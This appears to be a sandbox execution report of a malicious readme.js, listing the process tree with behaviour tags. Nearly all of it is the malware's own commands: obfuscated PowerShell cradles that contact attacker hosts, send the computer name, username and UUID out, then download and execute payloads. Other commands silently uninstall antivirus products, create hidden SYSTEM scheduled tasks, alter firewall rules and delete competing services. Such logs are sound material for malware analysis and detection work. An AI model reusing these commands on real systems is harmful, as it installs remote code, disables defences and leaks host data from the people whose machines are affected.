C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\readme.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b notepad C:\Users\Admin\AppData\Local\Temp\readme.js & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*EIDQHRRL*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\notepad.exenotepad C:\Users\Admin\AppData\Local\Temp\readme.js3⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*EIDQHRRL*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c echo Set-MpPreference -DisableRealtimeMonitoring 14⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%Eset%'" call uninstall /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%avast%'" call uninstall /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%avp%'" call uninstall /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%Security%'" call uninstall /nointeractive5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart4⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \RAyou71hSe /F /tr "powershell -w hidden -c PS_CMD"4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn \RAyou71hSe4⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn w3zJRG\P7G6p3t /F /tr "powershell -w hidden -c PS_CMD"4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn w3zJRG\P7G6p3t4⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\IuKU1vQE\m8lB4QK90L /F /tr "powershell -w hidden -c PS_CMD"4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn MicroSoft\Windows\IuKU1vQE\m8lB4QK90L4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c netsh.exe firewall add portopening tcp 65529 SDNSd4⤵
-
C:\Windows\system32\netsh.exenetsh.exe firewall add portopening tcp 65529 SDNSd5⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=534⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny445 dir=in protocol=tcp localport=445 action=block4⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny135 dir=in protocol=tcp localport=135 action=block4⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn Rtsa2 /F4⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn Rtsa1 /F4⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn Rtsa /F4⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {3C8292FC-D1C9-428B-B0D6-C0720615F4A6} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zz3'+'r0.com';a($url+'/a.jsp?mail_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zer'+'9g.com';a($url+'/a.jsp?mail_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='727753b00afea107203a693b45e9fd24';$ifp=$env:tmp+'\if.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/if.bin?^^^&EIDQHRRL^^^&00000000-0000-0000-0000-000000000000^^^&E6:7B:5C:AE:C1:15');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|0MSJ3Ad6IVD.exe -3⤵
- Loads dropped DLL
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='727753b00afea107203a693b45e9fd24';$ifp=$env:tmp+'\if.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/if.bin?^&EIDQHRRL^&00000000-0000-0000-0000-000000000000^&E6:7B:5C:AE:C1:15');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\0MSJ3Ad6IVD.exe0MSJ3Ad6IVD.exe -4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\j5c31vh0\j5c31vh0.cmdline"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES79B2.tmp" "c:\Windows\Temp\j5c31vh0\CSCAA465576E467457C89EA48149380364.TMP"6⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\1liziz1t\1liziz1t.cmdline"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES8F06.tmp" "c:\Windows\Temp\1liziz1t\CSC55942279109D4A31AFB3C31D8BAF4A54.TMP"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\4grphwgc\4grphwgc.cmdline"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES4470.tmp" "c:\Windows\Temp\4grphwgc\CSCD9F71D3E49E4B70B656791AE788C78.TMP"6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='dcd9144d509e7c6e1e63ecdd7e50e935';$ifp=$env:tmp+'\m6.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^^^&EIDQHRRL^^^&00000000-0000-0000-0000-000000000000^^^&E6:7B:5C:AE:C1:15');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};i`ex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^^^|Get-Random -Count 100));test1 -PEBytes $bin|0MSJ3Ad6IVD.exe - &cmd /c copy /y %tmp%\m6.bin.ori %tmp%\m6.bin.exe & %tmp%\m6.bin.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='dcd9144d509e7c6e1e63ecdd7e50e935';$ifp=$env:tmp+'\m6.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^&EIDQHRRL^&00000000-0000-0000-0000-000000000000^&E6:7B:5C:AE:C1:15');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};i`ex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^|Get-Random -Count 100));test1 -PEBytes $bin"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\0MSJ3Ad6IVD.exe0MSJ3Ad6IVD.exe -4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='e04acec7ab98362d87d1c53d84fc4b03';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?^^^&EIDQHRRL^^^&00000000-0000-0000-0000-000000000000^^^&E6:7B:5C:AE:C1:15');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|0MSJ3Ad6IVD.exe -3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='e04acec7ab98362d87d1c53d84fc4b03';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?^&EIDQHRRL^&00000000-0000-0000-0000-000000000000^&E6:7B:5C:AE:C1:15');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\0MSJ3Ad6IVD.exe0MSJ3Ad6IVD.exe -4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\yadmwoyb\yadmwoyb.cmdline"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES158.tmp" "c:\Windows\Temp\yadmwoyb\CSCACE8DAE934C442BE8B6F9F04EE5AD75.TMP"6⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config xWinWpdSrv Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop xWinWpdSrv5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete xWinWpdSrv5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config SVSHost Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop SVSHost5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete SVSHost5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config "Microsoft Telemetry" Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop "Microsoft Telemetry"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete "Microsoft Telemetry"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config lsass Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop lsass5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete lsass5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Microsoft Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Microsoft5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Microsoft5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config system Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop system5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete system5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Oracleupdate Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Oracleupdate5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Oracleupdate5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config CLR Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop CLR5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete CLR5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config sysmgt Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop sysmgt5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete sysmgt5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config \gm Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop \gm5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete \gm5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WmdnPnSN Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WmdnPnSN5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WmdnPnSN5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Sougoudl Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Sougoudl5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Sougoudl5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config National Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop National5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete National5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Nationaaal Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Nationaaal5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Nationaaal5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Natimmonal Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Natimmonal5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Natimmonal5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Nationaloll Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Nationaloll5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Nationaloll5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Nationalmll Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Nationalmll5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Nationalmll5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Nationalaie Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Nationalaie5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Nationalaie5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Nationalwpi Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Nationalwpi5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Nationalwpi5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WinHelp32 Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WinHelp325⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WinHelp325⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WinHelp64 Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WinHelp645⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WinHelp645⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Samserver Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Samserver5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Samserver5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config RpcEptManger Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop RpcEptManger5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete RpcEptManger5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config "NetMsmqActiv Media NVIDIA" Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop "NetMsmqActiv Media NVIDIA"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete "NetMsmqActiv Media NVIDIA"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config "Sncryption Media Playeq" Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop "Sncryption Media Playeq"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete "Sncryption Media Playeq"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config SxS Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop SxS5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete SxS5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WinSvc Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WinSvc5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WinSvc5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config mssecsvc2.1 Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop mssecsvc2.15⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete mssecsvc2.15⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config mssecsvc2.0 Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop mssecsvc2.05⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete mssecsvc2.05⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Windows_Update Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Windows_Update5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Windows_Update5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config "Windows Managers" Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop "Windows Managers"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete "Windows Managers"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config SvcNlauser Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop SvcNlauser5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete SvcNlauser5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WinVaultSvc Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WinVaultSvc5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WinVaultSvc5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Xtfy Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Xtfy5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Xtfy5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Xtfya Start= Disabled5⤵
-
